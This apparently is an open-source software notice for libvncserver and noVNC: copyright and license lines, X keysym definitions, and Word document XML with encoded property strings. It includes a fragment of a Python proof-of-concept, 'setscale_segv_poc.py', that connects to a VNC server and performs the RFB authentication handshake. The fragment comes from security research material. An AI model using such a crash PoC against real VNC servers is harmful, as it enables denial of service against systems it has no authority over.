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libvncserver 0.9.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their individual authors. Please refer to the individual source files and/or to the noVNC commit history: https://github.com/kanaka/noVNC/commits/ma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ring in the executable of your produ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tatem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license. These can be included either as stand-alone text files, human-readable headers or in the appropriate machine-readable metadata fields within text or binary files as long as those fields can be easily viewed by the us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 Signed-off-by: Johannes Schindelin &lt;johannes.schindel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x00a9, /* U+00A9 COPYRIGHT SIGN */ XK_ordfeminine = 0x00aa, /* U+00AA FEMININE ORDINAL INDICATOR */ XK_guillemotleft = 0x00ab, /* U+00AB LEFT-POINTING DOUBLE ANGLE QUOTATION MARK */ XK_notsign = 0x00ac, /* U+00AC NOT SIGN */ XK_hyphen = 0x00ad, /* U+00AD SOFT HYPHEN */ XK_registered = 0x00ae, /* U+00AE REGISTERED SIGN */ XK_macron = 0x00af, /* U+00AF MACRON */ XK_degree = 0x00b0, /* U+00B0 DEGREE SIGN */ XK_plusminus = 0x00b1, /* U+00B1 PLUS-MINUS SIGN */ XK_twosuperior = 0x00b2, /* U+00B2 SUPERSCRIPT TWO */ XK_threesuperior = 0x00b3, /* U+00B3 SUPERSCRIPT THREE */ XK_acute = 0x00b4, /* U+00B4 ACUTE ACCENT */ XK_mu = 0x00b5, /* U+00B5 MICRO SIGN */ XK_paragraph = 0x00b6, /* U+00B6 PILCROW SIGN */ XK_periodcenter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afb define XK_caret 0xafc define XK_singlelowquotemark 0xafd define XK_doublelowquotemark 0xafe define XK_cursor 0xaff endif /* XK_PUBLISHIN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0x0a9 define XK_ordfeminine 0x0aa define XK_guillemotleft 0x0ab</w:t>
        <w:tab/>
        <w:t>/* left angle quotation mark */ define XK_notsign 0x0ac define XK_hyphen 0x0ad define XK_registered 0x0ae define XK_macron 0x0af define XK_degree 0x0b0 define XK_plusminus 0x0b1 define XK_twosuperior 0x0b2 define XK_threesuperior 0x0b3 define XK_acute 0x0b4 define XK_mu 0x0b5 define XK_paragraph 0x0b6 define XK_periodcentered 0x0b7 define XK_cedilla 0x0b8 define XK_onesuperior 0x0b9 define XK_masculine 0x0ba define XK_guillemotright 0x0bb</w:t>
        <w:tab/>
        <w:t>/* right angle quotation mark */ define XK_onequarter 0x0bc define XK_onehalf 0x0bd define XK_threequarters 0x0be define XK_questiondown 0x0bf define XK_Agrave 0x0c0 define XK_Aacute 0x0c1 define XK_Acircum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ZO Copyright (C) 1996-2014 Markus Franz Xaver Johannes Oberhumer\n" markus@oberhumer.com&gt;\n" http://www.oberhumer.com $\n\n" Id: LZO version: v" LZO_VERSION_STRING ", " LZO_VERSION_DATE " $\n" Info: " LZO_INFO_STRING " $\n";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iroshi Ichikawa &lt;http://gimite.net/en/&gt; License: New BSD License Reference: http://dev.w3.org/html5/websockets/ Reference: http://tools.ietf.org/html/rfc645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PL Group: Libraries/Network Packager: Johannes.Schindelin &lt;Johannes.Schindelin@gmx.de&gt; Source: %{name}-%{version}.tar.gz BuildRoot: %{_tmppath}/%{name}-%{version}-buildroo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ch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ELUS Security Labs" print "All Rights Reserved.\n" try: HOST = sys.argv[1] PORT = int(sys.argv[2]) except: print "Usage: python setscale_segv_poc.py &lt;host&gt; &lt;port&gt; password]" sys.exit(1) try: PASSWORD = sys.argv[3] except: print "No password supplied" PASSWORD = "" vnc = RFB() remote = socket.socket(socket.AF_INET, socket.SOCK_STREAM) remote.connect((HOST,PORT)) # Get server version data = remote.recv(1024) # Send 3.8 version remote.send(vnc.INIT_3008) # Get supported security types data = remote.recv(1024) # Process Security Message secType = vnc.AUTH_PROCESS(data,0) if secType[0] == "\x02": # Send accept for password auth remote.send(vnc.AUTH_PASS) # Get challenge data = remote.recv(1024) # Send challenge response remote.send(vnc.AUTH_PROCESS_CHALLENGE(data,PASSWORD)) elif secType[0] == "\x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This restriction only applies to the primary font name as presented to the us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tt McIne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by Digital Equipment Corporation, Maynard, Massachuset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by Erik Moll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ETF Trust and the persons identified as authors of the cod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ETF Trust and the persons identified as */ authors of the code. All rights reserved. */ See sha.h for terms of use and redistribut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 McInerney &lt;matt@pixelspread.com&gt;, with Reserved Font Name Orbitr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 McInerney &lt;matt@pixelspread.com&gt; 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arten Svante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Lars Brinkhoff &lt;lars@nocrew.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erald Point &lt;Gerald.Point@labri.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by Karl J. Runge &lt;runge@karlrun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Alexander Chemer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Karl J. Runge &lt;runge@karlrung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by Joergen Ibsen / Jib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abrice Bellard, 2004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ames "Wez" Weatherall,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Widget Workshop,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 Graven Imagery, 199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1990,1991,1992 by Richard Outerbridge GEnie : OUTER; CIS : [71755,2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1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10, 2012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9-2012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5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4 Landmark Graphics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uel Mannehed for Cendio AB noVNC is licensed under the MPL 2.0 (see LICENSE.txt) This file is licensed under the 2-Clause BSD license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uel Mannehed for Cendio AB Licensed under MPL 2.0 or any later version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Samuel Mannehed for Cendio AB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NTT corp.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 Van Hoof &lt;philip@codeminded.b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Martin Licensed under MPL 2.0 (see LICENSE.t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Joel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Bei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D. R. Comman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Christian Beier &lt;dontmind@freeshell.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hannes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Joel Martin &lt;github@martintrib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Gernot Tenchi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el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 R. Command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ic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is Mondesi &lt;lemsx1@gmail.com&gt; calls git directly. To use it just: cd ~/Project/my_git_repo; git2cl &gt; ChangeLog implements strptime() fixes bugs in $comment parsing copy input before we remove leading spaces skip "merge branch" statements as they don't have information about files (i.e. we never go into $state 2) behaves like a pipe/filter if input is given from the CLI else it calls git log by itse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 Mateus Cesar Groes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8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hit Kumar,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ohit Kumar &lt;rokumar@novell.com&gt;, Johannes E. Schindelin &lt;johannes.schindel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annes E. Schindel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Johannes E. Schindelin &lt;Johannes.Schindelin@gmx.de&gt;, Karl Runge &lt;runge@karlrung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andmark Graphics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Free Software Foundation, Inc. dnl dnl This file is free software; as a special exception the author gives dnl unlimited permission to copy and/or distribute it, with or without dnl modifications, as long as this notice is preserved. dnl dnl This file is distributed in the hope that it will be useful, but dnl WITHOUT ANY WARRANTY, to the extent permitted by law; without even the dnl implied warranty of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alVNC Lt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RealVNC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Johannes E. Schinde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2003,2004 Martyn J. Pearce &lt;fluffy@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hannes E. Schindelin &lt;Johannes.Schindelin@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rakan Software PalmVNC 1.4 &amp; 2.? SetScale Factor message SetScaleFactor - tell the RFB server to alter the scale factor for the client buff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Harakan Software PalmVNC 1.4 &amp; 2.? ResizeFrameBuffer message ReSizeFrameBuffer - tell the RFB client to alter its framebuffer, either due to a resize of the server desktop or a client-requested scaling factor. The pixel format remains unchan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an McGuirk &lt;mcguirk@incompleten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Constantin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Const Kaplinsk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r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Karl Fogel &lt;kfogel@red-be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AT&amp;T Laboratories Cambridg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Markus Franz Xaver Johannes Oberhum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by Jef Poskanzer &lt;jef@acme.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1999,2000,2001,2004,200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1997,1999,2000,2001,2005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08:5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fw3VTxHW9/1tLx95AiTJBMjyfi34FJcXzIyoMuAzj+9f48RePg6YG1kfLPa3ZOORmWZGFZEr
YlUE0WtRAFIyS5AQpZhoYhxiDP3b9T7ZD578IR6EQB4KnFMLlrZ7s5vhrvBuenjO9vAWtKJn
iYuDUw3Ws9vrfQyJJI+PEqmKx5PX4PnTQtUxZ1lrJwhBmlbvvAWHdyy8T2OfURHMFvZyKZbN
m80gHUI/ENxI+nrJrJ</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="_2015_ms_pID_7253431">
    <vt:lpwstr>Td0XSXPu9SH0VBtc+LKaGu4ZskH4vLSMaSKwEhZ7mjGZr5xh2df+68
SYtAUkECjA0dzGvv181DX6S7vtnsA5UFBHeai2frHge/TxB6J0M+sncPrARJ6Qs47vdqpPDu
viYoYp1EEXZEJTx0px0QbbDugUVja7KAA0LjZ45L4FVep2jNgpOFwDJ8n/AeP4girN4/ij0H
71aa/0sTDHdi47IsIvbmp1RjDRd7y4219xdt</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="_2015_ms_pID_7253431_00">
    <vt:lpwstr>_2015_ms_pID_7253431</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="_2015_ms_pID_7253432">
    <vt:lpwstr>NvW4TbU5qQ5eyR9yw0ioc/y5Tbvs/Uj83N3z
XrVsjMQKYcc1YwYXnXnCuNfC0c4MYKcLGSXTVzEWGSwIBnnKACk=</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253838</vt:lpwstr>
  </property>
</Properties>
</file>